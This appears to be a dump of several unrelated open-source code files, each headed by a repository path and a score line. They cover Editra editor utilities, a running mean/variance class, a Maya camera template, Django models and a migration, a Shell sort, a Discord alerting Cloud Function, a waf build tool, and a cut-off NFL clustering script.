""" def __init__(self, window, textcallback=None, filecallback=None): """Initializes the Drop target @param window: window to receive drop objects @keyword textcallback: Callback for when text is dropped @keyword filecallback: Callback for when file(s) are dropped """ super(DropTargetFT, self).__init__() # Attributes self.window = window self._data = dict(data=None, fdata=None, tdata=None, tcallb=textcallback, fcallb=filecallback) self._tmp = None self._lastp = None # Setup self.InitObjects() def CreateDragString(self, txt): """Creates a bitmap of the text that is being dragged @todo: possibly set colors to match highlighting of text @todo: generalize this to be usable by other widgets besides stc """ if not isinstance(self.window, wx.stc.StyledTextCtrl): return stc = self.window txt = txt.split(stc.GetEOLChar()) longest = (0, 0) for line in txt: ext = stc.GetTextExtent(line) if ext[0] > longest[0]: longest = ext cords = [ (0, x * longest[1]) for x in range(len(txt)) ] try: mdc = wx.MemoryDC(wx.EmptyBitmap(longest[0] + 5, longest[1] * len(txt), 32)) mdc.SetBackgroundMode(wx.TRANSPARENT) mdc.SetTextForeground(stc.GetDefaultForeColour()) mdc.SetFont(stc.GetDefaultFont()) mdc.DrawTextList(txt, cords) self._tmp = wx.DragImage(mdc.GetAsBitmap()) except wx.PyAssertionError, msg: Log("[droptargetft][err] %s" % str(msg)) def InitObjects(self): """Initializes the text and file data objects @postcondition: all data objects are initialized """ self._data['data'] = wx.DataObjectComposite() self._data['tdata'] = wx.TextDataObject() self._data['fdata'] = wx.FileDataObject() self._data['data'].Add(self._data['tdata'], True) self._data['data'].Add(self._data['fdata'], False) self.SetDataObject(self._data['data']) def OnEnter(self, x_cord, y_cord, drag_result): """Called when a drag starts @param x_cord: x cord of enter point @param y_cord: y cord of enter point @param drag_result: wxDrag value @return: result of drop object entering window """ # GetData seems to happen 
automatically on msw, calling it again # causes this to fail the first time. if wx.Platform in ['__WXGTK__', '__WXMSW__']: return wx.DragCopy if wx.Platform == '__WXMAC__': try: self.GetData() except wx.PyAssertionError: return wx.DragError self._lastp = (x_cord, y_cord) files = self._data['fdata'].GetFilenames() text = self._data['tdata'].GetText() if len(files): self.window.SetCursor(wx.StockCursor(wx.CURSOR_COPY_ARROW)) else: self.CreateDragString(text) return drag_result def OnDrop(self, x_cord=0, y_cord=0): """Gets the drop cords @keyword x_cord: x cord of drop object @keyword y_cord: y cord of drop object @todo: implement snapback when drop is out of range """ self._tmp = None self._lastp = None return True def OnDragOver(self, x_cord, y_cord, drag_result): """Called when the cursor is moved during a drag action @param x_cord: x cord of mouse @param y_cord: y cord of mouse @param drag_result: Drag result value @return: result of drag over @todo: For some reason the caret position changes which can be seen by the brackets getting highlighted. However the actual caret is not moved. 
""" stc = self.window if self._tmp is None: if hasattr(stc, 'DoDragOver'): val = stc.DoDragOver(x_cord, y_cord, drag_result) self.ScrollBuffer(stc, x_cord, y_cord) drag_result = wx.DragCopy else: # A drag image was created if hasattr(stc, 'DoDragOver'): point = wx.Point(x_cord, y_cord) self._tmp.BeginDrag(point - self._lastp, stc) self._tmp.Hide() stc.DoDragOver(x_cord, y_cord, drag_result) self._tmp.Move(point) self._tmp.Show() self._tmp.RedrawImage(self._lastp, point, True, True) self._lastp = point self.ScrollBuffer(stc, x_cord, y_cord) drag_result = wx.DragCopy return drag_result def OnData(self, x_cord, y_cord, drag_result): """Gets and processes the dropped data @param x_cord: x coordinate @param y_cord: y coordinate @param drag_result: wx Drag result value @postcondition: dropped data is processed """ self.window.SetCursor(wx.StockCursor(wx.CURSOR_ARROW)) if self.window.HasCapture(): self.window.ReleaseMouse() try: data = self.GetData() except wx.PyAssertionError: wx.PostEvent(self.window.GetTopLevelParent(), \ ed_event.StatusEvent(ed_event.edEVT_STATUS, -1, _("Unable to accept dropped file " "or text"))) data = False drag_result = wx.DragCancel if data: files = self._data['fdata'].GetFilenames() text = self._data['tdata'].GetText() if len(files) > 0 and self._data['fcallb'] is not None: self._data['fcallb'](files) elif len(text) > 0: if self._data['tcallb'] is not None: self._data['tcallb'](text) elif hasattr(self.window, 'DoDropText'): self.window.DoDropText(x_cord, y_cord, text) self.InitObjects() return drag_result def OnLeave(self): """Handles the event of when the drag object leaves the window @postcondition: Cursor is set back to normal state """ self.window.SetCursor(wx.StockCursor(wx.CURSOR_ARROW)) if self.window.HasCapture(): self.window.ReleaseMouse() if self._tmp is not None: try: self._tmp.EndDrag() except wx.PyAssertionError, msg: Log("[droptargetft][err] %s" % str(msg)) @staticmethod def ScrollBuffer(stc, x_cord, y_cord): """Scroll the buffer 
as the dragged text is moved towards the ends. @param stc: StyledTextCtrl @param x_cord: int (x position) @param y_cord: int (y position) @note: currently does not work on wxMac """ try: cline = stc.PositionFromPoint(wx.Point(x_cord, y_cord)) if cline != wx.stc.STC_INVALID_POSITION: cline = stc.LineFromPosition(cline) fline = stc.GetFirstVisibleLine() lline = stc.GetLastVisibleLine() if (cline - fline) < 2: stc.ScrollLines(-1) elif lline - cline < 2: stc.ScrollLines(1) else: pass except wx.PyAssertionError, msg: Log("[droptargetft][err] ScrollBuffer: %s" % msg) #---- End FileDropTarget ----# class EdClipboard(ebmlib.CycleCache): """Local clipboard object @todo: make into a singleton """ def GetNext(self): """Get the next item in the cache""" # Initialize the clipboard if it hasn't been loaded yet and # there is something in the system clipboard if self.GetCurrentSize() == 0: txt = GetClipboardText() if txt is not None: self.Put(txt) return super(EdClipboard, self).GetNext() def IsAtIndex(self, txt): """Is the passed in phrase at the current cycle index in the cache. Used to check if index should be reset or to continue in the cycle. 
@param txt: selected text """ pre = self.PeekPrev() next = self.PeekNext() if txt in (pre, next): return True else: return False def Put(self, txt): """Put some text in the clipboard @param txt: Text to put in the system clipboard """ pre = self.PeekPrev() next = self.PeekNext() if len(txt) and txt not in (pre, next): self.PutItem(txt) #---- Misc Common Function Library ----# # Used for holding the primary selection on mac/msw FAKE_CLIPBOARD = None def GetClipboardText(primary=False): """Get the primary selection from the clipboard if there is one @return: str or None """ if primary and wx.Platform == '__WXGTK__': wx.TheClipboard.UsePrimarySelection(True) elif primary: # Fake the primary selection on mac/msw global FAKE_CLIPBOARD return FAKE_CLIPBOARD else: pass text_obj = wx.TextDataObject() rtxt = None if wx.TheClipboard.IsOpened() or wx.TheClipboard.Open(): if wx.TheClipboard.GetData(text_obj): rtxt = text_obj.GetText() wx.TheClipboard.Close() if primary and wx.Platform == '__WXGTK__': wx.TheClipboard.UsePrimarySelection(False) return rtxt def SetClipboardText(txt, primary=False): """Copies text to the clipboard @param txt: text to put in clipboard @keyword primary: Set txt as primary selection (x11) """ # Check if using primary selection if primary and wx.Platform == '__WXGTK__': wx.TheClipboard.UsePrimarySelection(True) elif primary: # Fake the primary selection on mac/msw global FAKE_CLIPBOARD FAKE_CLIPBOARD = txt return True else: pass data_o = wx.TextDataObject() data_o.SetText(txt) if wx.TheClipboard.IsOpened() or wx.TheClipboard.Open(): wx.TheClipboard.SetData(data_o) wx.TheClipboard.Close() if primary and wx.Platform == '__WXGTK__': wx.TheClipboard.UsePrimarySelection(False) return True else: return False def FilterFiles(file_list): """Filters a list of paths and returns a list of paths that can probably be opened in the editor. 
@param file_list: list of files/folders to filter for good files in """ good = list() checker = ebmlib.FileTypeChecker() for path in file_list: if not checker.IsBinary(path): good.append(path) return good def GetFileType(fname): """Get what the type of the file is as Editra sees it in a formatted string. @param fname: file path @return: string (formatted/translated filetype) """ if os.path.isdir(fname): return _("Folder") eguess = syntax.GetTypeFromExt(fname.split('.')[-1]) if eguess == synglob.LANG_TXT and fname.split('.')[-1] == 'txt': return _("Text Document") elif eguess == synglob.LANG_TXT: mtype = mimetypes.guess_type(fname)[0] if mtype is not None: return mtype else: return _("Unknown") else: return _("%s Source File") % eguess def GetFileReader(file_name, enc='utf-8'): """Returns a file stream reader object for reading the supplied file name. It returns a file reader using the encoding (enc) which defaults to utf-8. If lookup of the reader fails on the host system it will return an ascii reader. If there is an error in creating the file reader the function will return a negative number. @param file_name: name of file to get a reader for @keyword enc: encoding to use for reading the file @return file reader, or int if error. """ try: file_h = file(file_name, "rb") except (IOError, OSError): dev_tool.DEBUGP("[file_reader] Failed to open file %s" % file_name) return -1 try: reader = codecs.getreader(enc)(file_h) except (LookupError, IndexError, ValueError): dev_tool.DEBUGP('[file_reader] Failed to get %s Reader' % enc) reader = file_h return reader def GetFileWriter(file_name, enc='utf-8'): """Returns a file stream writer object for reading the supplied file name. It returns a file writer in the supplied encoding if the host system supports it other wise it will return an ascii reader. The default will try and return a utf-8 reader. If there is an error in creating the file reader the function will return a negative number. 
@param file_name: path of file to get writer for @keyword enc: encoding to write text to file with """ try: file_h = open(file_name, "wb") except IOError: dev_tool.DEBUGP("[file_writer][err] Failed to open file %s" % file_name) return -1 try: writer = codecs.getwriter(enc)(file_h) except (LookupError, IndexError, ValueError): dev_tool.DEBUGP('[file_writer][err] Failed to get %s Writer' % enc) writer = file_h return writer # TODO: DEPRECATED - remove once callers migrate to ebmlib GetFileManagerCmd = ebmlib.GetFileManagerCmd def GetUserConfigBase(): """Get the base user configuration directory path""" cbase = ed_glob.CONFIG['CONFIG_BASE'] if cbase is None: cbase = wx.StandardPaths_Get().GetUserDataDir() if wx.Platform == '__WXGTK__': if u'.config' not in cbase and not os.path.exists(cbase): # If no existing configuration return xdg config path base, cfgdir = os.path.split(cbase) tmp_path = os.path.join(base, '.config') if os.path.exists(tmp_path): cbase = os.path.join(tmp_path, cfgdir.lstrip(u'.')) return cbase + os.sep def HasConfigDir(loc=u""): """ Checks if the user has a config directory and returns True if the config directory exists or False if it does not. @return: whether config dir in question exists on an expected path """ cbase = GetUserConfigBase() to_check = os.path.join(cbase, loc) return os.path.exists(to_check) def MakeConfigDir(name): """Makes a user config directory @param name: name of config directory to make in user config dir """ cbase = GetUserConfigBase() try: os.mkdir(cbase + name) except (OSError, IOError): pass def RepairConfigState(path): """Repair the state of profile path, updating and creating it it does not exist. 
@param path: path of profile """ if os.path.isabs(path) and os.path.exists(path): return path else: # Need to fix some stuff up CreateConfigDir() import profiler return profiler.Profile_Get("MYPROFILE") def CreateConfigDir(): """ Creates the user config directory its default sub directories and any of the default config files. @postcondition: all default configuration files/folders are created """ #---- Resolve Paths ----# config_dir = GetUserConfigBase() profile_dir = os.path.join(config_dir, u"profiles") dest_file = os.path.join(profile_dir, u"default.ppb") ext_cfg = [u"cache", u"styles", u"plugins"] #---- Create Directories ----# if not os.path.exists(config_dir): os.mkdir(config_dir) if not os.path.exists(profile_dir): os.mkdir(profile_dir) for cfg in ext_cfg: if not HasConfigDir(cfg): MakeConfigDir(cfg) import profiler profiler.TheProfile.LoadDefaults() profiler.Profile_Set("MYPROFILE", dest_file) profiler.TheProfile.Write(dest_file) profiler.UpdateProfileLoader() def ResolvConfigDir(config_dir, sys_only=False): """Checks for a user config directory and if it is not found it then resolves the absolute path of the executables directory from the relative execution path. This is then used to find the location of the specified directory as it relates to the executable directory, and returns that path as a string. @param config_dir: name of config directory to resolve @keyword sys_only: only get paths of system config directory or user one @note: This method is probably much more complex than it needs to be but the code has proven itself. 
""" # Try to get a User config directory if not sys_only: user_config = GetUserConfigBase() user_config = os.path.join(user_config, config_dir) if os.path.exists(user_config): return user_config + os.sep # Check if the system install path has already been resolved once before if ed_glob.CONFIG['INSTALL_DIR'] != u"": tmp = os.path.join(ed_glob.CONFIG['INSTALL_DIR'], config_dir) tmp = os.path.normpath(tmp) + os.sep if os.path.exists(tmp): return tmp else: del tmp # The following lines are used only when Editra is being run as a # source package. If the found path does not exist then Editra is # running as as a built package. if not hasattr(sys, 'frozen'): path = __file__ if not ebmlib.IsUnicode(path): path = path.decode(sys.getfilesystemencoding()) path = os.sep.join(path.split(os.sep)[:-2]) path = path + os.sep + config_dir + os.sep if os.path.exists(path): if not ebmlib.IsUnicode(path): path = unicode(path, sys.getfilesystemencoding()) return path # If we get here we need to do some platform dependent lookup # to find everything. 
path = sys.argv[0] if not ebmlib.IsUnicode(path): path = unicode(path, sys.getfilesystemencoding()) # If it is a link get the real path if os.path.islink(path): path = os.path.realpath(path) # Tokenize path pieces = path.split(os.sep) if wx.Platform == u'__WXMSW__': # On Windows the exe is in same dir as config directories pro_path = os.sep.join(pieces[:-1]) if os.path.isabs(pro_path): pass elif pro_path == u"": pro_path = os.getcwd() pieces = pro_path.split(os.sep) pro_path = os.sep.join(pieces[:-1]) else: pro_path = os.path.abspath(pro_path) elif wx.Platform == u'__WXMAC__': # On OS X the config directories are in the applet under Resources stdpath = wx.StandardPaths_Get() pro_path = stdpath.GetResourcesDir() pro_path = os.path.join(pro_path, config_dir) else: pro_path = os.sep.join(pieces[:-2]) if pro_path.startswith(os.sep): pass elif pro_path == u"": pro_path = os.getcwd() pieces = pro_path.split(os.sep) if pieces[-1] not in [ed_glob.PROG_NAME.lower(), ed_glob.PROG_NAME]: pro_path = os.sep.join(pieces[:-1]) else: pro_path = os.path.abspath(pro_path) if wx.Platform != u'__WXMAC__': pro_path = pro_path + os.sep + config_dir + os.sep path = os.path.normpath(pro_path) + os.sep # Make sure path is unicode if not ebmlib.IsUnicode(path): path = unicode(path, sys.getdefaultencoding()) return path def GetResources(resource): """Returns a list of resource directories from a given toplevel config dir @param resource: config directory name @return: list of resource directory that exist under the given resource path """ rec_dir = ResolvConfigDir(resource) if os.path.exists(rec_dir): rec_lst = [ rec.title() for rec in os.listdir(rec_dir) if os.path.isdir(rec_dir + rec) and rec[0] != u"." ] return rec_lst else: return -1 def GetResourceFiles(resource, trim=True, get_all=False, suffix=None, title=True): """Gets a list of resource files from a directory and trims the file extentions from the names if trim is set to True (default). 
If the get_all parameter is set to True the function will return a set of unique items by looking up both the user and system level files and combining them, the default behavior returns the user level files if they exist or the system level files if the user ones do not exist. @param resource: name of config directory to look in (i.e cache) @keyword trim: trim file extensions or not @keyword get_all: get a set of both system/user files or just user level @keyword suffix: Get files that have the specified suffix or all (default) @keyword title: Titlize the results """ rec_dir = ResolvConfigDir(resource) if get_all: rec_dir2 = ResolvConfigDir(resource, True) rec_list = list() if not os.path.exists(rec_dir): return -1 else: recs = os.listdir(rec_dir) if get_all and os.path.exists(rec_dir2): recs.extend(os.listdir(rec_dir2)) for rec in recs: if os.path.isfile(rec_dir + rec) or \ (get_all and os.path.isfile(rec_dir2 + rec)): # If a suffix was specified only keep files that match if suffix is not None: if not rec.endswith(suffix): continue # Trim the last part of an extension if one exists if trim: rec = ".".join(rec.split(u".")[:-1]).strip() # Make the resource name a title if requested if title and len(rec): rec = rec[0].upper() + rec[1:] if len(rec): rec_list.append(rec) rec_list.sort() return list(set(rec_list)) def GetAllEncodings(): """Get all encodings found on the system @return: list of strings """ elist = encodings.aliases.aliases.values() elist = list(set(elist)) elist.sort() elist = [ enc for enc in elist if not enc.endswith('codec') ] return elist def Log(msg, *args): """Push the message to the apps log @param msg: message string to log @param args: optional positional arguments to use as a printf formatting to the message. 
""" try: wx.GetApp().GetLog()(msg, args) except: pass def GetProxyOpener(proxy_set): """Get a urlopener for use with a proxy @param proxy_set: proxy settings to use """ Log("[util][info] Making proxy opener with %s" % str(proxy_set)) proxy_info = dict(proxy_set) auth_str = "%(uname)s:%(passwd)s@%(url)s" url = proxy_info['url'] if url.startswith('http://'): auth_str = "http://" + auth_str proxy_info['url'] = url.replace('http://', '') else: pass if len(proxy_info.get('port', '')): auth_str = auth_str + ":%(port)s" proxy_info['passwd'] = ed_crypt.Decrypt(proxy_info['passwd'], proxy_info['pid']) Log("[util][info] Formatted proxy request: %s" % \ (auth_str.replace('%(passwd)s', '****') % proxy_info)) proxy = urllib2.ProxyHandler({"http" : auth_str % proxy_info}) opener = urllib2.build_opener(proxy, urllib2.HTTPHandler) return opener #---- GUI helper functions ----# def SetWindowIcon(window): """Sets the given windows icon to be the programs application icon. @param window: window to set app icon for """ try: if wx.Platform == "__WXMSW__": ed_icon = ed_glob.CONFIG['SYSPIX_DIR'] + u"editra.ico" window.SetIcon(wx.Icon(ed_icon, wx.BITMAP_TYPE_ICO)) else: ed_icon = ed_glob.CONFIG['SYSPIX_DIR'] + u"editra.png" window.SetIcon(wx.Icon(ed_icon, wx.BITMAP_TYPE_PNG)) finally: pass #-----------------------------------------------------------------------------# class IntValidator(wx.PyValidator): """A Generic integer validator""" def __init__(self, min_=0, max_=0): """Initialize the validator @keyword min_: min value to accept @keyword max_: max value to accept """ wx.PyValidator.__init__(self) self._min = min_ self._max = max_ # Event management self.Bind(wx.EVT_CHAR, self.OnChar) def Clone(self): """Clones the current validator @return: clone of this object """ return IntValidator(self._min, self._max) def Validate(self, win): """Validate an window value @param win: window to validate """ val = win.GetValue() return val.isdigit() def OnChar(self, event): """Process values as they 
are entered into the control @param event: event that called this handler """ key = event.GetKeyCode() if key < wx.WXK_SPACE or key == wx.WXK_DELETE or \ key > 255 or chr(key) in '0123456789': event.Skip() return if not wx.Validator_IsSilent(): wx.Bell() return
2.234375
2
genrl/environments/vec_env/utils.py
matrig/genrl
390
16756
from typing import Tuple

import torch


class RunningMeanStd:
    """Running estimator of the mean and variance of batched samples.

    :param epsilon: Small number to prevent division by zero for calculations
    :param shape: Shape of the RMS object
    :type epsilon: float
    :type shape: Tuple
    """

    def __init__(self, epsilon: float = 1e-4, shape: Tuple = ()):
        # Neutral starting estimate; the tiny pseudo-count keeps the first
        # update from dividing by zero.
        self.mean = torch.zeros(shape).double()
        self.var = torch.ones(shape).double()
        self.count = epsilon

    def update(self, batch: torch.Tensor):
        """Fold one batch of samples (stacked along dim 0) into the stats."""
        m_b = torch.mean(batch, axis=0)
        v_b = torch.var(batch, axis=0)
        n_b = batch.shape[0]

        n_total = self.count + n_b
        gap = m_b - self.mean

        # Parallel (Chan et al.) combination of two groups' statistics.
        m2 = (
            self.var * self.count
            + v_b * n_b
            + (gap ** 2) * self.count * n_b / n_total
        )

        self.mean = self.mean + gap * n_b / n_total
        self.var = m2 / (n_total - 1)
        self.count = n_total
3.0625
3
releases/pota-windows-1.3-ai5.0.2.0/ae/aiPotaTemplate.py
sumitneup/pota
0
16757
import mtoa.ui.ae.templates as templates
import pymel.core as pm
import maya.cmds as cmds
import mtoa.ui.ae.utils as aeUtils


# Attribute Editor template for the "pota" (Polynomial Optics) Arnold camera
# shader: exposes the lens-model and depth-of-field attributes in Maya's AE.
class aiPotaTemplate(templates.AttributeTemplate):

    # The triple-quoted string below is deliberately disabled code for a
    # Bokeh-AOV EXR file picker; it is kept for reference, not executed.
    """
    def filenameEditBokeh(self, mData) :
        attr = self.nodeAttr('aiBokehEXRPath')
        cmds.setAttr(attr,mData,type="string")

    def LoadFilenameButtonPushBokeh(self, *args):
        basicFilter = 'All Files (*.*)'
        ret = cmds.fileDialog2(fileFilter=basicFilter, dialogStyle=2, cap='Select sample_bokeh file location',fm=0)
        if ret is not None and len(ret):
            self.filenameEditBokeh(ret[0])
            cmds.textFieldButtonGrp("filenameBokehGrp", edit=True, text=ret[0])

    def filenameNewBokeh(self, nodeName):
        path = cmds.textFieldButtonGrp("filenameBokehGrp", label="Bokeh AOV EXR path", changeCommand=self.filenameEditBokeh, width=300)
        cmds.textFieldButtonGrp(path, edit=True, text=cmds.getAttr(nodeName))
        cmds.textFieldButtonGrp(path, edit=True, buttonLabel="...", buttonCommand=self.LoadFilenameButtonPushBokeh)

    def filenameReplaceBokeh(self, nodeName):
        cmds.textFieldButtonGrp("filenameBokehGrp", edit=True, text=cmds.getAttr(nodeName) )
    """

    def setup(self):
        # Build the "Polynomial Optics" section of the Attribute Editor.
        self.beginLayout("Polynomial Optics", collapse=False)
        self.addControl("aiLensModel", label="Lens Model")
        self.addControl("aiSensorWidth", label="Sensor Width (mm)")
        self.addControl("aiWavelength", label="Wavelength (nm)")
        self.addControl("aiDof", label="Enable depth of field")
        self.addControl("aiFstop", label="F-stop")
        self.addControl("aiFocalDistance", label="Focus distance (cm)")
        self.addControl("aiExtraSensorShift", label="Extra Sensor shift (mm)")
        self.addControl("aiVignettingRetries", label="Vignetting retries")
        self.addControl("aiApertureBlades", label="Aperture blades")
        self.addControl("aiProperRayDerivatives", label="Proper Ray Derivatives")

        # add these in the aovshader template instead
        # self.suppress('normalCamera')
        # self.suppress('hardwareColor')

        self.endLayout()

        # Disabled "AOV shader" UI section, kept for reference (see the
        # commented-out Bokeh file-picker methods above).
        """
        self.addSeparator()
        self.addSeparator()
        self.addSeparator()
        self.addSeparator()
        self.addSeparator()
        self.addSeparator()

        self.beginLayout("AOV shader", collapse=False)
        self.addControl("aiBackwardSamples", label="Backwards samples")
        self.addControl("aiMinimumRgb", label="Minimum RGB")
        self.addCustom("aiBokehEXRPath", self.filenameNewBokeh, self.filenameReplaceBokeh)
        self.endLayout()
        """

templates.registerTranslatorUI(aiPotaTemplate, "camera", "pota")
2.21875
2
tests/test_user.py
munniomer/Send-IT-Api-v1
0
16758
import unittest
from app import create_app
import json
from tests.basetest import BaseTest


class TestUSer(BaseTest):
    """Tests for the user-registration endpoint (/api/v1/user/register).

    Fixture users (self.new_user, self.new_user1, ...) come from BaseTest.
    """

    def test_user_registration(self):
        """Tests that a valid new user can register (201 Created)."""
        respon = self.client.post("/api/v1/user/register", json=self.new_user)
        self.assertEqual(respon.status_code, 201)

    def test_if_name_city_valid(self):
        """Tests rejection when fname/lname/city are empty or contain numbers."""
        respon = self.client.post(
            "/api/v1/user/register", json=self.new_user1, content_type='application/json')
        self.assertEqual(respon.status_code, 400)
        self.assertIn('PLease check if your fname, lname or city is empty or contains numbers', str(respon.data))

    def test_if_email_valid(self):
        """Tests rejection of a malformed email address."""
        respon = self.client.post(
            "/api/v1/user/register", json=self.new_user2, content_type='application/json')
        self.assertEqual(respon.status_code, 400)
        self.assertIn('Please enter a valid emai', str(respon.data))

    def test_if_email_exist(self):
        """Tests rejection when the email is already registered."""
        # First registration succeeds; the second with the same email must fail.
        self.client.post(
            "/api/v1/user/register", json=self.new_user6, content_type='application/json')
        respon = self.client.post(
            "/api/v1/user/register", json=self.new_user6, content_type='application/json')
        self.assertEqual(respon.status_code, 400)
        self.assertIn('That email exists. use a unique email', str(respon.data))

    def test_if_phone_valid(self):
        """Tests rejection of an invalid phone number."""
        respon = self.client.post(
            "/api/v1/user/register", json=self.new_user3, content_type='application/json')
        self.assertEqual(respon.status_code, 400)
        self.assertIn('Please enter a valid phone number ', str(respon.data))

    def test_if_password_valid(self):
        """Tests rejection when either password field is empty or shorter than 3."""
        respon = self.client.post(
            "/api/v1/user/register", json=self.new_user4, content_type='application/json')
        self.assertEqual(respon.status_code, 400)
        self.assertIn('Please check if your password or confirm password are empty or less than 3', str(respon.data))

    def test_if_password_match(self):
        """Tests rejection when password and confirmation do not match."""
        respon = self.client.post(
            "/api/v1/user/register", json=self.new_user5, content_type='application/json')
        self.assertEqual(respon.status_code, 400)
        self.assertIn('confirm password does not match password', str(respon.data))
3.421875
3
authors/apps/profiles/migrations/0023_auto_20190124_1222.py
andela/ah-django-unchained
0
16759
<reponame>andela/ah-django-unchained
# Generated by Django 2.1.4 on 2019-01-24 12:22
# Auto-generated schema migration: makes UserProfile.first_name and
# UserProfile.last_name optional (blank=True) 100-character fields.

from django.db import migrations, models


class Migration(migrations.Migration):

    # Must run after the previous profiles migration.
    dependencies = [
        ('profiles', '0022_auto_20190123_1211'),
    ]

    operations = [
        migrations.AlterField(
            model_name='userprofile',
            name='first_name',
            field=models.CharField(blank=True, max_length=100),
        ),
        migrations.AlterField(
            model_name='userprofile',
            name='last_name',
            field=models.CharField(blank=True, max_length=100),
        ),
    ]
1.742188
2
Algorithm/ShellSort/pyShellSort.py
commanderHR1/algorithms
1
16760
# Implementation of Shell Sort algorithm in Python


def shellSort(arr):
    """Sort *arr* in place using Shell sort with Knuth's gap sequence.

    :param arr: mutable sequence of mutually comparable items; sorted in place.
    :return: None — the input list itself is reordered.
    """
    # Build the largest Knuth gap (1, 4, 13, 40, ...) below len(arr) / 3.
    interval = 1
    while interval < (len(arr) // 3):
        interval = (interval * 3) + 1

    while interval > 0:
        # Gapped insertion sort for the current interval.
        for i in range(interval, len(arr)):
            # Select val to be inserted
            val = arr[i]
            j = i

            # Shift larger elements right, one gap at a time.
            while (j > interval - 1) and (arr[j - interval] >= val):
                arr[j] = arr[j - interval]
                j -= interval

            # Insert val at hole position
            arr[j] = val

        # BUG FIX: use floor division. The original `(interval - 1) / 3`
        # yields a float in Python 3, so range(interval, ...) raised
        # TypeError on any list long enough for the gap to exceed 1
        # (len(arr) >= 13). `//` keeps the gap an int.
        interval = (interval - 1) // 3


if __name__ == "__main__":
    demo = [4, 1, 2, 5, 3]
    print("Initial list: " + str(demo))
    shellSort(demo)
    print("Sorted list: " + str(demo))
4.34375
4
photos/models.py
benjaminbills/galleria
0
16761
<reponame>benjaminbills/galleria
from django.db import models

# Create your models here.
class Image(models.Model):
    """A gallery photo, linked to a Location and a Category."""
    name = models.CharField(max_length=255)
    posted_date = models.DateTimeField(auto_now_add=True)
    image_description = models.CharField(max_length=500, default='DEFAULT VALUE')
    image = models.ImageField(upload_to='images/', blank=True)
    location = models.ForeignKey('Location', on_delete=models.CASCADE, default=0)
    category = models.ForeignKey('Category', on_delete=models.CASCADE, default=0)
    def __str__(self):
        return self.name
    def save_image(self):
        """Persist this image record."""
        self.save()
    def delete_image(self):
        """Remove this image record."""
        self.delete()
    @classmethod
    def update_image(cls,image_id):
        # NOTE(review): .update() is called with no field arguments, so this
        # writes nothing — confirm whether kwargs were meant to be passed.
        image=cls.objects.filter(pk=image_id)
        image.update()
        return image
    @classmethod
    def search_by_category(cls,search_term):
        """Return images whose category name contains *search_term*."""
        images = cls.objects.filter(category__name__contains=search_term)
        return images
    @classmethod
    def search_by_location(cls,search_term):
        """Return images whose location name contains *search_term*."""
        images = cls.objects.filter(location__name__contains=search_term)
        return images
    @classmethod
    def get_image_by_id(cls,id):
        """Return the single image with primary key *id* (raises DoesNotExist)."""
        image=cls.objects.get(id=id)
        return image

class Location(models.Model):
    """A place an image was taken; referenced by Image.location."""
    name = models.CharField(max_length=255)
    #magic method
    def __str__(self):
        return self.name
    def save_location(self):
        """Persist this location."""
        self.save()
    def delete_location(self):
        """Remove this location (cascades to its images)."""
        self.delete()
    @classmethod
    def update_location(cls, id, name):
        """Rename the location with primary key *id*; returns rows updated."""
        location = cls.objects.filter(pk=id).update(name=name)
        return location

class Category(models.Model):
    """A grouping label for images; referenced by Image.category."""
    name = models.CharField(max_length=255)
    #magic method
    def __str__(self):
        return self.name
    def save_category(self):
        """Persist this category."""
        self.save()
    def delete_category(self):
        """Remove this category (cascades to its images)."""
        self.delete()
    @classmethod
    def update_category(cls, id, name):
        """Rename the category with primary key *id*; returns rows updated."""
        category = cls.objects.filter(pk=id).update(name=name)
        return category
2.375
2
main.py
kramrm/gcf-alerting-discord
0
16762
import base64
import json
from webhook import post_webhook
from datetime import datetime


def hello_pubsub(event, context):
    """Triggered from a message on a Cloud Pub/Sub topic.

    Decodes the Pub/Sub payload, extracts the monitoring incident it
    carries, formats a markdown summary and forwards it to Discord via
    ``post_webhook``.

    Args:
         event (dict): Event payload; ``event['data']`` holds the
             base64-encoded JSON message published to the topic.
         context (google.cloud.functions.Context): Metadata for the event
             (unused).
    """
    payload = base64.b64decode(event['data']).decode('utf-8')
    message = json.loads(payload)['incident']

    status = message['state'].title()
    title = message['policy_name']

    timestamp = datetime.utcfromtimestamp(message["started_at"]).isoformat()
    log_message = f'Started: {timestamp} UTC'
    # Embed colour: 0xFFEE00 (yellow) while open, 0x00FF11 (green) once ended.
    color = 16772608
    if message['ended_at'] is not None:
        timestamp = datetime.utcfromtimestamp(message["ended_at"]).isoformat()
        log_message += f'\nEnded: {timestamp} UTC'
        color = 65297
    log_message += f'\n{message["summary"]}'
    log_message += f'\n[Monitor Event]({message["url"]})'
    post_webhook(message=log_message, timestamp=timestamp, status=status,
                 title=title, color=color)
2.671875
3
libzyre.py
brettviren/wafit
0
16763
<reponame>brettviren/wafit
#!/usr/bin/env waf
'''
This is a wafit tool for using zyre
'''

import util

def options(opt):
    """Register command-line options for locating libzyre.

    Loads the libczmq tool first, since zyre depends on czmq; the shared
    helper adds the standard include/lib option set (libs disabled).
    """
    opt.load("libczmq")
    util.generic_options(opt, "libzyre", libs=False)

def configure(cfg):
    """Check for zyre headers and library on top of a configured libczmq."""
    cfg.load("libczmq")
    util.generic_configure_incs(cfg, "libzyre", "zyre.h", "libczmq")
    util.generic_configure_libs(cfg, "libzyre", "zyre", "libczmq")
1.398438
1
scripts/run-gmm.py
vr100/nfl-kaggle
0
16764
import argparse, os, fnmatch, json, joblib
import pandas as pd
from sklearn.mixture import GaussianMixture
from sklearn.metrics import adjusted_rand_score

# Reference paper - https://arxiv.org/abs/1906.11373
# "Unsupervised Methods for Identifying Pass Coverage Among Defensive Backs with NFL Player Tracking Data"

STATS_PREFIX = "week"
SKIP_COLS_KEY = "global_skip_cols"
ONLY_CLOSEST_KEY = "only_closest"
CLOSE_TO_BR_KEY = "close_to_br"
SELECT_GROUP_KEY = "select_group_by"
GROUP_BY = ["gameId", "playId"]
MAX_COL = "closest_frames"

def run_gmm_for_g_and_k(file_data, g, k, skip_cols, only_closest, close_to_br):
    """Leave-one-week-out GMM comparison.

    Fits a g-component GMM on every week except index *k*, fits a second
    GMM on week *k* alone, predicts week-k cluster labels with both, and
    returns (adjusted Rand index between the two labelings, LOWO model).
    """
    file_count = len(file_data)
    data = pd.DataFrame()
    for j in range(file_count):
        if j == k:
            continue
        # NOTE(review): DataFrame.append was removed in pandas 2.x —
        # confirm the pinned pandas version, or migrate to pd.concat.
        data = data.append(file_data[j], ignore_index=True)
    if only_closest == 1:
        # Keep only the row with the most "closest" frames per play.
        data = data.loc[data.groupby(GROUP_BY)[MAX_COL].idxmax()].reset_index(
            drop=True)
    elif len(close_to_br) != 0:
        data = data[data[CLOSE_TO_BR_KEY].isin(close_to_br)]
